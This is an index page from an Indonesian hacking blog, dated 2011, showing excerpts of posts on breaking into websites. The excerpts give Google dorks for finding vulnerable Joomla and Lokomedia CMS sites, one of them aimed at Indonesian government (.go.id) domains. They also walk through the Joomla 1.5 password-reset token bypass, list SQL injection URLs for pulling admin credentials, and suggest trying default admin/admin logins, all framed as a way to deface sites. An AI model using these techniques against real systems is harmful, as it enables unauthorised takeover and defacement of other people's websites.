Kamis, 01 Desember 2011

MOVE

Blog ane pindah ke sini aja... liat ini yaah... www.zone-cumi.us Like juga page on facebook nya Thanks.. Salam Cumi++ ...

Senin, 28 Februari 2011

Reset Joomla Password

======================================= | Vuln Joomla, Mereset Password Admin | ======================================= Jika admin belum lagi patch Vuln ini,, kamu sangat bertuah^_^ 1) Find Error Site (pakcik Google.com) --> inurl:jos_users" inurl:"index.php 2) Forget A Password --> /index.php?option=com_user&view=reset 3) Its Find E-Mail --> (0x3a,username,0x3a,email,0x3a,password,0x3a,activation)4) Its Find Username --> (0x3a,username,0x3a,email,0x3a,password,0x3a,activation) 5) Its Find Admin Profile --> (username,0x3a,password) 6) Its Find Token --> (0x3a,username,0x3a,email,0x3a,0x3a,activation) 7) Its Find Login/Outlogin --> index.php?option=com_user&view=login * inurl:"option=com_juser" * its find error sites, Some Site :- --> (0x3a,username,0x3a,email,0x3a,0x3a,activation) -->...

Hacking Joomla 1.5

cara deface situs yang di buat pake joomla. langkah2 :(Untuk joomla 1.5.X) 1. cari situs yang dibangun menggunakan joomla, minta bantuan paman google. kata kunci: inurl:option=com_user atau inurl:option=com_user site:go.id -->khusus untuk situs pemerintah 2. temukan situs target misalnya: http://www.target.go.id/index.php?option=com_user&view=login&.....dst 3. ganti alamat tersebut sehingga menjadi http://www.target.go.id/index.php?option=com_user&view=reset&layout=confirm 4. pada form input yang tampil berikan tanda token tanda ' (tanda petik tunggal) lalu klik kirim 5. jika berhasil maka akan keluar form untuk mereset password. masukan password baru sesuai yang kita inginkan 6. klik submit atau enter maka password default administrator joomla akan di rubah 7. langkah...

Joomla SQL Injections

SQL Injection Joomla 1.5 _____________________________________________________________ 1. Google dork = allinurl:option=com_user |========================== [x]. Cek Vuln site/index.php?option=com_user&view=reset&layout=confirm [x]. Cek UID n Pass Admin site/index.php?option=com_docman&task=doc_details&gid=3&Itemid=1 site/index.php?option=com_docman&task=doc_details&gid=3&Itemid=2 site/index.php?option=com_docman&task=doc_details&gid=3&Itemid=3 "sampai muncul tabel informasi" [x]. Login Site/administrator ______________________________________________________________________ 2. Google dork = allinurl:mod.php?mod=publisher | ============================== [x]. Cek Vuln site/mod.php?mod=publisher&op=viewcat&cid=2' [x]....

Hacking CMS lokomedia

CMS Lokomedia atau bisa juga disebut dengan Lokomedia CMS, ada juga saya dengar orang-orang suku maya menyebutnya dengan Suka CMS, CMS Lokomedia ini adalah pemprograman web content management system (CMS) berbasis PHP dan MySQL. CMS ini murni buatan anak bangsa Indonesia, buatan Mas Lukmanul Hakim yang ditulis dan diabadikan dalam buku cetakkan dari Lokomedia yang akhirnya menjadi nama dari CMS ini. ok langsung aja ya pada google ketik dork : Code: inurl:semua-berita.html pilih web yg akan di eksekusi setelah dapat web yg akan di eksekusi cari login adminnya dengan menambahkan /adminweb contoh : www.target.com/adminweb coba masukkan username & password default'a username : admin password : admin ingat tidak semua user dan password'a default ok next setelah masuk pada panel adminnya...

Twitter Delicious Facebook Digg Stumbleupon Favorites More

 
ReDesign by Cumi++ | Affiliate Network Reviews